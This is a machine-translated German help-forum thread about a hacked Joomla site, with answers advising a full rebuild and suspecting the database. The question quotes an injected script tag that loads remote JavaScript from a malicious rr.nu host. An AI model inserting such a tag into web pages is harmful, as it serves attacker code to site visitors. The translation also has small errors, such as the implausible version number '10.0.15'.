2012-03-27 5 views
-1

Ich habe eine alte Joomla 10.0.15, die vor einer Woche gehackt wurde, ich habe keine Sicherung, weil wir planen, zu migrieren, aber ich muss wissen, was passiert. Nach fix Berechtigungen, alle Kerndateien neu zu installieren, haben noch zwei Probleme, ist die erste, noch bösartiger Code:Joomla-Website gehackt

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> 
</script> 
<script type="text/javascript"> 
_uacct ="UA-xxxxxxx-x"; 
urchinTracker(); 
</script> 
<script src="http://equate22motorde.rr.nu/nl.php?p=d"></script> 
</body> 

ändern Sie die URL mit jedem Neuladen. Ich kann nicht finden, wo der Code ist. Ich habe die Vorlage und andere Dateien überprüft, aber nichts. ¿Irgendwelche Ideen über wo kann ich überprüfen?

Das andere Problem ist mit dem Datei- und Ordnerzugriff, auch wenn die Berechtigungen in Ordnung sind, kann diese Joomla-Installation nicht in Ordner schreiben oder eine Datei ändern.

Vielen Dank im Voraus.

+2

Versuchen Sie in einem Joomla-Forum zu fragen. – Steven

+1

versuchen Sie nicht, die ursprüngliche Website zu reparieren. Wie Devin unten erwähnt, können Sie nicht sicher sein, was sich geändert hat, so dass Sie nie wissen werden, ob Sie alles repariert haben. Wenn Sie keine Sicherungskopie haben, besteht die einzige sichere Lösung darin, die Website in einer neuen Joomla-Installation neu zu erstellen und Ihre Medien zu kopieren, ohne Ihren Code zu kopieren. Das ist eine sehr sehr sehr alte Version von Joomla (3+ Jahre). Der beste Ort, um Rat zu suchen, ist im J1.0 Sicherheitsforum hier: http://bit.ly/HbDJUs – Trev

+0

Versuchen Sie, einige gute Sicherheitserweiterungen für Ihre Joomla-Site zu installieren, überprüfen Sie regelmäßig die Zugriffsprotokolle, blockieren Sie die Berechtigungen für die wichtigen Dateien, installieren Sie nur Erweiterungen von vertrauenswürdigen Quellen, aktualisieren Sie regelmäßig Ihre Kern Joomla-Quelldateien .... Dies sind die minimalen Schritte, um Ihre Joomla-Site zu sichern. –

Antwort

2

Sie müssen den Code, den Sie von einem bekannten guten Backup haben, erneut bereitstellen, der weiß, was geändert oder kompromittiert wurde. Wenn Sie auch für den Server verantwortlich sind, müssen Sie die Sicherheitslücke schließen und das System auf Anzeichen von Manipulationen überprüfen, obwohl die beste Lösung für Sie darin besteht, den Server neu zu erstellen und von vorne anzufangen.

0

Wahrscheinlich haben sie den bösartigen Code in die Datenbank eingefügt.

Aber Sie sollten den Server als kompromittiert behandeln: Formatieren Sie das Laufwerk, installieren Sie das Betriebssystem neu und erstellen Sie Ihre Joomla-Umgebung neu. Behandle alle Daten, die du von diesem Server nimmst, ebenfalls als gefährlich.

Verwandte Themen